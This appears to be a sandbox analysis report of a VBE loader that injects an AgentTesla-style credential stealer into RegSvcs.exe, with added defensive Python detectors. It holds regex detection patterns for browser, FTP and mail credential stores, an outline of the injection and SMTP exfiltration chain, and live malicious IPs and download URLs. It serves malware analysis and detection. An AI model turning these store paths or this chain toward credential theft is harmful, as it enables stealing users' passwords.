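# Credential stores RegSvcs.exe opened in the behaviour log above, grouped by family.
# Regexes are anchored on the suffix so any user profile name matches.
CREDENTIAL_STORES = {
    "chrome":       r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
    "edge":         r"\\AppData\\Local\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$",
    "firefox":      r"\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\.ini$",
    "thunderbird":  r"\\AppData\\Roaming\\Thunderbird\\profiles\.ini$",
    "cyberfox":     r"\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\profiles\.ini$",
    "blackhawk":    r"\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles\.ini$",
    "ftpnavigator": r"^C:\\FTP Navigator\\Ftplist\.txt$",
    "winscp":       r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions$",
    "mapi":         r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles$",
    "incredimail":  r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$",
}
_COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in CREDENTIAL_STORES.items()}

# Images that legitimately own each store (assumed mapping, not taken from the report).
OWNERS = {
    "chrome": {"chrome.exe"}, "edge": {"msedge.exe"}, "firefox": {"firefox.exe"},
    "thunderbird": {"thunderbird.exe"}, "cyberfox": {"cyberfox.exe"},
    "blackhawk": {"blackhawk.exe"}, "ftpnavigator": {"ftpnavigator.exe"},
    "winscp": {"winscp.exe"}, "mapi": {"outlook.exe"}, "incredimail": {"incmail.exe"},
}
# .NET utilities that script loaders inject payloads into. RegSvcs.exe is the one in
# this report; the others are assumed from common loader behaviour.
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def classify_target(target):
    """Return the credential-store family a file path or registry key belongs to, or None."""
    for name, rx in _COMPILED.items():
        if rx.search(target):
            return name
    return None


def score_processes(events, min_families=3):
    """events: iterable of (pid, image_path, target). Returns {pid: report} for each
    process that touched at least one store. 'suspicious' is set when the image is a
    known injection host or it read >= min_families store families it does not own."""
    per_pid = {}
    for pid, image, target in events:
        family = classify_target(target)
        if family is None:
            continue
        entry = per_pid.setdefault(pid, {"image": image.rsplit("\\", 1)[-1].lower(),
                                         "families": set(), "foreign": set()})
        entry["families"].add(family)
        if entry["image"] not in OWNERS.get(family, set()):
            entry["foreign"].add(family)
    for entry in per_pid.values():
        entry["suspicious"] = (entry["image"] in INJECTION_HOSTS
                               or len(entry["foreign"]) >= min_families)
    return per_pid


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [  # constructed from the report entries above; PID 6176 as in the report
    (6176, REGSVCS, r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (6176, REGSVCS, r"C:\FTP Navigator\Ftplist.txt"),
    (6176, REGSVCS, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (6176, REGSVCS, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (6176, REGSVCS, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    # benign control (constructed): Chrome reading its own password store and a document
    (4242, CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (4242, CHROME, r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for pid, rep in score_processes(SAMPLE_EVENTS).items():
        flag = "SUSPICIOUS" if rep["suspicious"] else "ok"
        print(f"{pid} {rep['image']} {sorted(rep['families'])} {flag}")
```

The family threshold matters more than any single path: a backup agent or a browser reading its own store trips nothing, while one process walking Chrome, Edge, Firefox, WinSCP and three mail clients in succession is the stealer pattern regardless of which image hosts it.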

Remote Access Functionality

Yara matches, sources:
  dump.pcap (type: PCAP)
  8.2.RegSvcs.exe.370000.0.unpack (type: UNPACKEDPE)
  00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
  00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
  00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
  Process Memory Space: RegSvcs.exe PID: 6176 (type: MEMORYSTR)
MITRE ATT&CK matrix (rebuilt from the flattened table, one line per tactic). Techniques followed by a number in brackets were triggered by signatures in this analysis; the bracketed digits are the superscript signature counts as rendered on the page. The remaining cells are the unpopulated placeholder techniques of the matrix template.

  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
  Resource Development: Scripting [311]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
  Execution: Windows Management Instrumentation [121]; Exploitation for Client Execution [1]; PowerShell [2]; Cron; Launchd; Scheduled Task; Systemd Timers
  Persistence: Scripting [311]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
  Privilege Escalation: DLL Side-Loading [1]; Process Injection [311]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
  Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [311]; Compile After Delivery
  Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
  Discovery: File and Directory Discovery [2]; System Information Discovery [24]; Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; System Network Configuration Discovery [1]
  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
  Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
  Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]; Multiband Communication; Commonly Used Port
  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior graph, rendered here as a process tree (the original is an interactive diagram). Behavior Graph ID: 1539284; Sample: Ref#150689.vbe; Start date: 22/10/2024; Architecture: WINDOWS; Score: 100. Node numbers are the graph's node IDs; the numbers after a process name are the graph's created-file and created-registry-value counters as rendered.

Start (node 2)
  DNS: api.ipify.org
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  +-- wscript.exe (node 8; counter 1) started
  |     Signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
  |     +-- powershell.exe (node 15; counter 43) started
  |     |     Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
  |     |     +-- RegSvcs.exe (node 20; counters 15, 2) started
  |     |     |     Network: 162.254.34.31 TCP 587 (local port 49764), VIVIDHOSTINGUS, United States; api.ipify.org 104.26.13.205 TCP 443 (local port 49751), CLOUDFLARENETUS, United States
  |     |     |     Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
  |     |     +-- wermgr.exe (node 24; counter 19) started
  |     |     +-- conhost.exe (node 26) started
  |     +-- powershell.exe (node 18; counter 37) started
  |           +-- wermgr.exe (node 28; counter 19) started
  |           +-- conhost.exe (node 30) started
  +-- wscript.exe (node 11; counters 32, 1) started
        Network: 144.91.79.54 TCP 80 (local port 49705), CONTABODE, Germany
        Dropped: C:\Users\user\AppData\...\dirDChDJoZeRjid.vbs (ISO-8859)
        Signatures: System process connects to network (likely due to code injection or exploit); Potential evasive VBS script found (sleep loop); Windows Shell Script Host drops VBS files; Suspicious execution chain found

Two details of the graph are worth reading together: the public-IP lookup against api.ipify.org and the connection to TCP 587 (the SMTP submission port) both come from RegSvcs.exe, the process that PowerShell injected the PE into, not from any process that would normally send mail.
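The graph gives the network side of the chain: a script host pulls the next stage over HTTP, and the injected RegSvcs.exe looks up its public IP and then opens a connection to TCP 587. As an added example, not from the report and not any vendor's code, the Python below encodes those observations as rules over Sysmon-style network-connection records and aggregates the hits per image. The NetEvent field names, the process allow-lists (beyond wscript.exe, powershell.exe and RegSvcs.exe, which the report shows) and the two benign control events are assumptions; the three malicious connections are copied from the graph.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class NetEvent:
    """Subset of a Sysmon Event ID 3 (network connection) record; field names are assumed."""
    image: str
    dst_ip: str
    dst_port: int
    dst_host: str = ""


# Process classes. wscript.exe, powershell.exe and RegSvcs.exe appear in the report;
# the other members of each set are assumed from common tradecraft.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
IP_CHECK_HOSTS = {"api.ipify.org", "checkip.dyndns.org", "ip-api.com"}  # ipify is from the report
SMTP_PORTS = {25, 465, 587}  # 587 (submission) is the port RegSvcs.exe used in the graph


def image_name(path):
    """Lower-cased file name of an image path (Windows separators)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_connection(ev):
    """Names of the rules one connection trips; an empty list means nothing to report."""
    name = image_name(ev.image)
    hits = []
    if name in SCRIPT_HOSTS:
        hits.append("script-host-outbound")
    if name in INJECTION_HOSTS:
        hits.append("dotnet-utility-outbound")
    if ev.dst_port in SMTP_PORTS and name not in MAIL_CLIENTS:
        hits.append("smtp-from-non-mail-client")
    if ev.dst_host.lower() in IP_CHECK_HOSTS and name not in BROWSERS:
        hits.append("external-ip-lookup")
    return hits


def triage(events):
    """Aggregate rule hits per image. The combination dotnet-utility-outbound +
    external-ip-lookup + smtp-from-non-mail-client on one image is the RegSvcs.exe
    pattern from the graph: injected payload, IP check, then traffic to an SMTP port,
    which is consistent with mail-based exfiltration."""
    by_image = {}
    for ev in events:
        hits = classify_connection(ev)
        if hits:
            by_image.setdefault(image_name(ev.image), set()).update(hits)
    return by_image


SAMPLE_EVENTS = [  # first three copied from the behaviour graph; last two are constructed benign controls
    NetEvent(r"C:\Windows\System32\wscript.exe", "144.91.79.54", 80),
    NetEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", "162.254.34.31", 587),
    NetEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", "104.26.13.205", 443, "api.ipify.org"),
    NetEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "203.0.113.10", 587),
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "104.26.13.205", 443, "api.ipify.org"),
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(sorted(hits))}")
```

Each rule on its own is noisy (administrators do run PowerShell that reaches the network); the value is in the per-image aggregation, where a .NET registration utility that does an IP lookup and then talks SMTP has no benign explanation.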



Antivirus results (Source | Detection | Scanner | Label):
  Ref#150689.vbe | 11% | ReversingLabs | Script-WScript.Trojan.GuLoader
  No Antivirus matches (reported for each of the three remaining categories of the table)

The ReversingLabs label describes the script stage that wscript.exe runs, while the AgentTesla verdict rests on the Yara matches against the PE that PowerShell injected into RegSvcs.exe. The two labels name different stages of one chain, a loader and its payload, and are not in conflict.
URL reputation (Source | Detection | Scanner | Label):
  https://api.ipify.org/ | 0% | URL Reputation | safe
  https://account.dyn.com/ | 0% | URL Reputation | safe
  https://api.ipify.org/t | 0% | URL Reputation | safe
  http://schemas.micro | 0% | URL Reputation | safe
  https://api.ipify.org | 0% | URL Reputation | safe
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
  api.ipify.org | 104.26.13.205 | true | false | none | unknown
URLs without a memory-dump source (Name | Malicious | Antivirus Detection | Reputation):
  https://api.ipify.org/ | false | URL Reputation: safe | unknown

URLs found in process memory (Name | Source process: memory dump(s) | Malicious | Antivirus Detection | Reputation):
  https://account.dyn.com/ | RegSvcs.exe: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  http://144.91.79.54/$ | wscript.exe: 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/0G | wscript.exe: 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/L | wscript.exe: 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/e4 | wscript.exe: 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54:80/1210/thEh4UQ3nf0RsZGPSynf.txtx | wscript.exe: 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/P | wscript.exe: 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  https://api.ipify.org/t | RegSvcs.exe: 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  http://144.91.79.54:80/1210/file | wscript.exe: 00000000.00000003.2098255050.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2097077335.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://schemas.micro | wscript.exe: 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  http://144.91.79.54/T | wscript.exe: 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/ | wscript.exe: 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  https://api.ipify.org | RegSvcs.exe: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  http://144.91.79.54/D | wscript.exe: 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/file | wscript.exe: 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100564601.000001E89858F000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/s | wscript.exe: 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2079284658.000001E896783000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2088250036.000001E89858A000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2074981941.000001E896783000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/r | wscript.exe: 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2079284658.000001E89675B000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/ | wscript.exe: 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/8 | wscript.exe: 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/l | wscript.exe: 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/v8 | wscript.exe: 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/vs | wscript.exe: 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/v | wscript.exe (one source listed without a dump reference), wscript.exe: 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2104531570.000001E898825000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2102491620.00000007D56F1000.00000004.00000010.00020000.00000000.sdmp, 00000000.00000003.2099250622.000001E896A98000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe: 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  http://144.91.79.54/BA;0 | wscript.exe: 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/8 | wscript.exe: 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown
  http://144.91.79.54/1210/thEh4UQ3nf0RsZGPSynf.txt | wscript.exe: 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp | false | none | unknown

Most of the 144.91.79.54 entries are string-carving residue rather than distinct endpoints: the carver picked up a real URL plus one or two bytes of adjacent memory (/1210/v8, /1210/vs, thEh4UQ3nf0RsZGPSynf.txtx) or the host root followed by a junk segment (/$, /BA;0). The download URL that appears cleanly is http://144.91.79.54/1210/thEh4UQ3nf0RsZGPSynf.txt, which is the string to carry on an indicator list; "http://schemas.micro" is a truncation of a schema namespace and the "URL Reputation: safe" entries are framework strings, not contacts.
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
IP             Domain         Country        ASN    ASN Name         Malicious
144.91.79.54   unknown        Germany        51167  CONTABODE        true
104.26.13.205  api.ipify.org  United States  13335  CLOUDFLARENETUS  false
162.254.34.31  unknown        United States  64200  VIVIDHOSTINGUS   true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539284
Start date and time: 2024-10-22 14:45:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#150689.vbe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBE@14/19@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .vbe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ref#150689.vbe
Time      Type             Description
08:46:03  API Interceptor  9x Sleep call for process: wscript.exe modified
08:46:12  API Interceptor  131x Sleep call for process: powershell.exe modified
08:46:28  API Interceptor  18x Sleep call for process: RegSvcs.exe modified
08:46:44  API Interceptor  2x Sleep call for process: wermgr.exe modified
14:46:06  Task Scheduler   Run new task: dirDChDJoZeRjid path: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs
Process: C:\Windows\System32\wermgr.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5201198159915306
Encrypted: false
SSDEEP: 96:soF7cp0nj2rxYid67nRH3Uje0e3e/3hosM1QXIGZAX/d5FMT2SlPkpXmTA2f/VX7:hNj2mG67nR30hHxAzuiFsZ24lO8r
MD5: B2770F2F1F7D08A2D9AE6581C5034AAC
SHA1: DD956BE9E2BCB699FBB265C44EAFC993E29005D8
SHA-256: DA5456695CB1E363568C289630AF46E208BD5312E0E86D6B2AC556A7F0CC58E7
SHA-512: D50A2FFF2EA237619378FC0DEF7A2A05B7B25B57B7DAD15430CDEF9FF3479E8BC2221F782FF909AA722F7440C2DC58CFBD7E6E7714533523D6B4AEBF9B898CF4
Malicious: false
Reputation: low

Process: C:\Windows\System32\wermgr.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5345553664920891
Encrypted: false
SSDEEP: 96:0nFxjGrxYid6cRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTArnf/VXT5NHn:iHGmG6cR30wAAzuiFbZ24lO8
MD5: 18C88BB7D9DD3C12D8EB72339F96D5C2
SHA1: AE5C8543503D4DE652043D177EE943FDADFD452F
SHA-256: 1F27DB385D4FC3CB520505BE08E40934324F2928B886487C6A3E59FA8C1CA347
SHA-512: 185D99893BCC87B25F6B1FC7399C96E31416068411830E2E8345AB0C6EB45EDF53796352F4292984E10A36A17355F80B3F81EA1B24680E1E893A193881FE37C6
Malicious: false
Reputation: low

Process: C:\Windows\System32\wermgr.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 7418
Entropy (8bit): 3.6853919664549597
Encrypted: false
SSDEEP: 192:R6l7wVeJURdjVDBO6YSZ2XbGgmftqBppZm:R6lXJgpDI6Y826gmftq+
MD5: 808E3E253D3C68C96AEB3F91791F8AEE
SHA1: 635F27D7FD80AD740B869E86372ECFD92A4DAD12
SHA-256: 0C367DC938849B0739F2083FA224A7D3CB52B481F1B6299087F7617FC2D4E384
SHA-512: 7E779D0F89BBCBC5E118C680B6C60FD193B0CDDA04A4EE0085A567585044DF88F5151F1A6DDB67B9623C42F3881D0073FD60124FA34B992BACD2A8320AF3A239
Malicious: false
Reputation: low

Process: C:\Windows\System32\wermgr.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4899
Entropy (8bit): 4.569460746123698
Encrypted: false
SSDEEP: 48:cvIwWl8zsfJg771I9xWWpW8VYlPYm8M4JFKlnOtSFvIyq8vT0OtN/ytfmd:uIjfBI7G37VtJFKlnpIWT0k/ufmd
MD5: FB4587E92414F27E5AE2B5CA52118CD0
SHA1: C0A3BC91F696377197A18433AF15DE9AA12667EE
SHA-256: BF6146081042E9E0A47792352CC336D0592434011910464E22BF515F2808E7EB
SHA-512: 02428DD097C8D4F0267B1578ABB6C38E95929292760BE7C0E16F44402BE441C33E1E75DE0E985539AA631C8C84C07313BAAC093F95364AC04198574CC2BF9D2D
Malicious: false

